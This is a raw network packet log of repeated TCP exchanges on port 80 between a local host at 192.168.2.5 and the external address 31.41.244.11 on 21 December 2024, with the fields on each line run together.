                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.163116932 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.163201094 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.163253069 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.164207935 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.164263964 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.164326906 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.164376974 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.165420055 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.165476084 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.165530920 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.165589094 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.166548014 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.166660070 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.166682005 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.166728020 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.167710066 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.167772055 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.167820930 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.167870045 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.168884993 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.168931007 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.168972969 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.169025898 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.172235966 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.172291994 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.172910929 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.172944069 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.172969103 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.172979116 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.173003912 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.173012972 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.173019886 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.173048973 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.173055887 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.173103094 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.174464941 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.174499989 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.174526930 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.174550056 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.175625086 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.175659895 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.175700903 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.175702095 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.176477909 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.176512957 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.176539898 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.176563025 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.177359104 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.177419901 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.177515984 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.177567959 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.178989887 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.179025888 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.179053068 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.179085970 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.179714918 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.179768085 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.179886103 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.179935932 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.180943966 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.181008101 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.181103945 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.181159019 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.182105064 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.182156086 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.182298899 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.182344913 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.183264971 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.183352947 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.183449984 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.183501959 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.184355974 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.184402943 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.184499025 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.184549093 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.185596943 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.185647964 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.185741901 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.185789108 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.186825037 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.186858892 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.186872959 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.186906099 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.188075066 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.188111067 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.188138008 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.188169956 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.189167023 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.189213991 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.189332008 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.189380884 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.190268993 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.190303087 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.190315962 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.190351009 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.191497087 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.191531897 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.191554070 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.191600084 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.192727089 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.192761898 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.192774057 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.192809105 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.193758965 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.193808079 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.193958998 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.194024086 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.194998980 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.195050955 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.195173025 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.195218086 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.196072102 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.196122885 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.196217060 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.196266890 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.197338104 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.197371960 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.197386980 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.197422981 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.198576927 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.198611975 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.198626995 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.198662043 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.199492931 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.199546099 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.199666977 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.199716091 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.200726986 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.200787067 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.331408978 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.331495047 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.331630945 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.331722021 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.331954956 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.332077980 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.332113028 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.332144022 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.333112955 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.333184004 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.333240032 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.333292007 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.334281921 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.334335089 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.334425926 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.334471941 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.335436106 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.335499048 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.335551977 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.335613012 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.336613894 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.336667061 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.336721897 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.336767912 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.337785959 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.337830067 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.337899923 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.337976933 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.338948965 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.338999033 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.339071989 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.339112043 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.340101004 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.340152979 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.340240955 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.340291977 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.341276884 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.341325998 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.341414928 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.341459990 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.342472076 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.342528105 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.342565060 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.342611074 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.343637943 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.343686104 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.343774080 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.343827009 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.344837904 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.344890118 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.344897032 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.344958067 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.345912933 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.345957994 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.346048117 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.346091986 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.347081900 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.347126961 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.347206116 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.347259045 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.348256111 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.348309040 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.348325968 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.348376989 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.349616051 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.349680901 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.349744081 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.349793911 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.350588083 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.350641966 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.350776911 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.350841999 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.351813078 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.351862907 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.351900101 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.351948023 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.352931023 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.352984905 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.353050947 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.353097916 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.354104042 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.354152918 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.354214907 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.354260921 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.355264902 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.355334044 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.355398893 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.355446100 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.356405020 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.356477022 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.356532097 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.356581926 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.357573986 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.357625008 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.357665062 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.357711077 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.358735085 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.358786106 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.358855963 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.358930111 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.359920979 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.359973907 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.360045910 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.360110044 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.361089945 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.361136913 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.361208916 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.361273050 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.362257004 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.362308979 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.362437963 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.362488031 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.363396883 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.363461971 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.363548994 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.363617897 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.364569902 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.364614964 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.364701033 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.364758015 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.365926981 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.366004944 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.366005898 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.366054058 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.366981983 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.367031097 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.367093086 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.367145061 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.368068933 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.368119001 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.368222952 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.368271112 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.369281054 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.369333982 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.369421959 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.369466066 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.370418072 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.370476961 CET4982880192.168.2.531.41.244.11
